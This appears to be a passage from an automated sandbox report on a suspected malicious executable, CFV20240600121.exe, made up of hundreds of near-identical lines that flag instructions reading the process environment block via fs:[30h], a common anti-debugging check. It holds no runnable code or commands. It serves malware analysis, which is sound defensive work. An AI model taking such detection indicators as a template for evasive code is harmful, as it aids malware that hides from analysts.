            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6154 mov eax, dword ptr fs:[00000030h]12_2_013D6154
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6154 mov eax, dword ptr fs:[00000030h]12_2_013D6154
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CC156 mov eax, dword ptr fs:[00000030h]12_2_013CC156
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014961C3 mov eax, dword ptr fs:[00000030h]12_2_014961C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014961C3 mov eax, dword ptr fs:[00000030h]12_2_014961C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E1D0 mov eax, dword ptr fs:[00000030h]12_2_0144E1D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E1D0 mov eax, dword ptr fs:[00000030h]12_2_0144E1D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E1D0 mov ecx, dword ptr fs:[00000030h]12_2_0144E1D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E1D0 mov eax, dword ptr fs:[00000030h]12_2_0144E1D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E1D0 mov eax, dword ptr fs:[00000030h]12_2_0144E1D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CA197 mov eax, dword ptr fs:[00000030h]12_2_013CA197
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CA197 mov eax, dword ptr fs:[00000030h]12_2_013CA197
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CA197 mov eax, dword ptr fs:[00000030h]12_2_013CA197
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A61E5 mov eax, dword ptr fs:[00000030h]12_2_014A61E5
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014001F8 mov eax, dword ptr fs:[00000030h]12_2_014001F8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148C188 mov eax, dword ptr fs:[00000030h]12_2_0148C188
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148C188 mov eax, dword ptr fs:[00000030h]12_2_0148C188
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01410185 mov eax, dword ptr fs:[00000030h]12_2_01410185
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01474180 mov eax, dword ptr fs:[00000030h]12_2_01474180
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01474180 mov eax, dword ptr fs:[00000030h]12_2_01474180
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145019F mov eax, dword ptr fs:[00000030h]12_2_0145019F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145019F mov eax, dword ptr fs:[00000030h]12_2_0145019F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145019F mov eax, dword ptr fs:[00000030h]12_2_0145019F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145019F mov eax, dword ptr fs:[00000030h]12_2_0145019F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456050 mov eax, dword ptr fs:[00000030h]12_2_01456050
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CA020 mov eax, dword ptr fs:[00000030h]12_2_013CA020
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CC020 mov eax, dword ptr fs:[00000030h]12_2_013CC020
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE016 mov eax, dword ptr fs:[00000030h]12_2_013EE016
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE016 mov eax, dword ptr fs:[00000030h]12_2_013EE016
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE016 mov eax, dword ptr fs:[00000030h]12_2_013EE016
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE016 mov eax, dword ptr fs:[00000030h]12_2_013EE016
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01454000 mov ecx, dword ptr fs:[00000030h]12_2_01454000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01472000 mov eax, dword ptr fs:[00000030h]12_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FC073 mov eax, dword ptr fs:[00000030h]12_2_013FC073
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D2050 mov eax, dword ptr fs:[00000030h]12_2_013D2050
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01466030 mov eax, dword ptr fs:[00000030h]12_2_01466030
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014520DE mov eax, dword ptr fs:[00000030h]12_2_014520DE
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C80A0 mov eax, dword ptr fs:[00000030h]12_2_013C80A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014560E0 mov eax, dword ptr fs:[00000030h]12_2_014560E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014120F0 mov ecx, dword ptr fs:[00000030h]12_2_014120F0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D208A mov eax, dword ptr fs:[00000030h]12_2_013D208A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CC0F0 mov eax, dword ptr fs:[00000030h]12_2_013CC0F0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D80E9 mov eax, dword ptr fs:[00000030h]12_2_013D80E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CA0E3 mov ecx, dword ptr fs:[00000030h]12_2_013CA0E3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014680A8 mov eax, dword ptr fs:[00000030h]12_2_014680A8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014960B8 mov eax, dword ptr fs:[00000030h]12_2_014960B8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014960B8 mov ecx, dword ptr fs:[00000030h]12_2_014960B8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A634F mov eax, dword ptr fs:[00000030h]12_2_014A634F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01452349 mov eax, dword ptr fs:[00000030h]12_2_01452349
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01478350 mov ecx, dword ptr fs:[00000030h]12_2_01478350
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145035C mov eax, dword ptr fs:[00000030h]12_2_0145035C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145035C mov eax, dword ptr fs:[00000030h]12_2_0145035C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145035C mov eax, dword ptr fs:[00000030h]12_2_0145035C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145035C mov ecx, dword ptr fs:[00000030h]12_2_0145035C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145035C mov eax, dword ptr fs:[00000030h]12_2_0145035C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145035C mov eax, dword ptr fs:[00000030h]12_2_0145035C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149A352 mov eax, dword ptr fs:[00000030h]12_2_0149A352
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CC310 mov ecx, dword ptr fs:[00000030h]12_2_013CC310
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F0310 mov ecx, dword ptr fs:[00000030h]12_2_013F0310
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147437C mov eax, dword ptr fs:[00000030h]12_2_0147437C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A30B mov eax, dword ptr fs:[00000030h]12_2_0140A30B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A30B mov eax, dword ptr fs:[00000030h]12_2_0140A30B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A30B mov eax, dword ptr fs:[00000030h]12_2_0140A30B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A8324 mov eax, dword ptr fs:[00000030h]12_2_014A8324
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A8324 mov ecx, dword ptr fs:[00000030h]12_2_014A8324
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A8324 mov eax, dword ptr fs:[00000030h]12_2_014A8324
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A8324 mov eax, dword ptr fs:[00000030h]12_2_014A8324
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148C3CD mov eax, dword ptr fs:[00000030h]12_2_0148C3CD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014563C0 mov eax, dword ptr fs:[00000030h]12_2_014563C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014743D4 mov eax, dword ptr fs:[00000030h]12_2_014743D4
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014743D4 mov eax, dword ptr fs:[00000030h]12_2_014743D4
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E3DB mov eax, dword ptr fs:[00000030h]12_2_0147E3DB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E3DB mov eax, dword ptr fs:[00000030h]12_2_0147E3DB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E3DB mov ecx, dword ptr fs:[00000030h]12_2_0147E3DB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E3DB mov eax, dword ptr fs:[00000030h]12_2_0147E3DB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8397 mov eax, dword ptr fs:[00000030h]12_2_013C8397
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8397 mov eax, dword ptr fs:[00000030h]12_2_013C8397
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8397 mov eax, dword ptr fs:[00000030h]12_2_013C8397
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F438F mov eax, dword ptr fs:[00000030h]12_2_013F438F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F438F mov eax, dword ptr fs:[00000030h]12_2_013F438F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE388 mov eax, dword ptr fs:[00000030h]12_2_013CE388
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE388 mov eax, dword ptr fs:[00000030h]12_2_013CE388
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE388 mov eax, dword ptr fs:[00000030h]12_2_013CE388
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014063FF mov eax, dword ptr fs:[00000030h]12_2_014063FF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE3F0 mov eax, dword ptr fs:[00000030h]12_2_013EE3F0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE3F0 mov eax, dword ptr fs:[00000030h]12_2_013EE3F0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE3F0 mov eax, dword ptr fs:[00000030h]12_2_013EE3F0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E03E9 mov eax, dword ptr fs:[00000030h]12_2_013E03E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA3C0 mov eax, dword ptr fs:[00000030h]12_2_013DA3C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA3C0 mov eax, dword ptr fs:[00000030h]12_2_013DA3C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA3C0 mov eax, dword ptr fs:[00000030h]12_2_013DA3C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA3C0 mov eax, dword ptr fs:[00000030h]12_2_013DA3C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA3C0 mov eax, dword ptr fs:[00000030h]12_2_013DA3C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA3C0 mov eax, dword ptr fs:[00000030h]12_2_013DA3C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D83C0 mov eax, dword ptr fs:[00000030h]12_2_013D83C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D83C0 mov eax, dword ptr fs:[00000030h]12_2_013D83C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D83C0 mov eax, dword ptr fs:[00000030h]12_2_013D83C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D83C0 mov eax, dword ptr fs:[00000030h]12_2_013D83C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01458243 mov eax, dword ptr fs:[00000030h]12_2_01458243
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01458243 mov ecx, dword ptr fs:[00000030h]12_2_01458243
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C823B mov eax, dword ptr fs:[00000030h]12_2_013C823B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A625D mov eax, dword ptr fs:[00000030h]12_2_014A625D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148A250 mov eax, dword ptr fs:[00000030h]12_2_0148A250
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148A250 mov eax, dword ptr fs:[00000030h]12_2_0148A250
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480274 mov eax, dword ptr fs:[00000030h]12_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C826B mov eax, dword ptr fs:[00000030h]12_2_013C826B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4260 mov eax, dword ptr fs:[00000030h]12_2_013D4260
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4260 mov eax, dword ptr fs:[00000030h]12_2_013D4260
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4260 mov eax, dword ptr fs:[00000030h]12_2_013D4260
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6259 mov eax, dword ptr fs:[00000030h]12_2_013D6259
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CA250 mov eax, dword ptr fs:[00000030h]12_2_013CA250
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A62D6 mov eax, dword ptr fs:[00000030h]12_2_014A62D6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E02A0 mov eax, dword ptr fs:[00000030h]12_2_013E02A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E02A0 mov eax, dword ptr fs:[00000030h]12_2_013E02A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E284 mov eax, dword ptr fs:[00000030h]12_2_0140E284
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E284 mov eax, dword ptr fs:[00000030h]12_2_0140E284
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01450283 mov eax, dword ptr fs:[00000030h]12_2_01450283
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01450283 mov eax, dword ptr fs:[00000030h]12_2_01450283
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01450283 mov eax, dword ptr fs:[00000030h]12_2_01450283
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E02E1 mov eax, dword ptr fs:[00000030h]12_2_013E02E1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E02E1 mov eax, dword ptr fs:[00000030h]12_2_013E02E1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E02E1 mov eax, dword ptr fs:[00000030h]12_2_013E02E1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014662A0 mov eax, dword ptr fs:[00000030h]12_2_014662A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014662A0 mov ecx, dword ptr fs:[00000030h]12_2_014662A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014662A0 mov eax, dword ptr fs:[00000030h]12_2_014662A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014662A0 mov eax, dword ptr fs:[00000030h]12_2_014662A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014662A0 mov eax, dword ptr fs:[00000030h]12_2_014662A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014662A0 mov eax, dword ptr fs:[00000030h]12_2_014662A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140656A mov eax, dword ptr fs:[00000030h]12_2_0140656A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140656A mov eax, dword ptr fs:[00000030h]12_2_0140656A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140656A mov eax, dword ptr fs:[00000030h]12_2_0140656A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01466500 mov eax, dword ptr fs:[00000030h]12_2_01466500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8550 mov eax, dword ptr fs:[00000030h]12_2_013D8550
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8550 mov eax, dword ptr fs:[00000030h]12_2_013D8550
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F45B1 mov eax, dword ptr fs:[00000030h]12_2_013F45B1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F45B1 mov eax, dword ptr fs:[00000030h]12_2_013F45B1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E5CF mov eax, dword ptr fs:[00000030h]12_2_0140E5CF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E5CF mov eax, dword ptr fs:[00000030h]12_2_0140E5CF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A5D0 mov eax, dword ptr fs:[00000030h]12_2_0140A5D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A5D0 mov eax, dword ptr fs:[00000030h]12_2_0140A5D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C5ED mov eax, dword ptr fs:[00000030h]12_2_0140C5ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C5ED mov eax, dword ptr fs:[00000030h]12_2_0140C5ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D2582 mov eax, dword ptr fs:[00000030h]12_2_013D2582
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D2582 mov ecx, dword ptr fs:[00000030h]12_2_013D2582
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01404588 mov eax, dword ptr fs:[00000030h]12_2_01404588
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
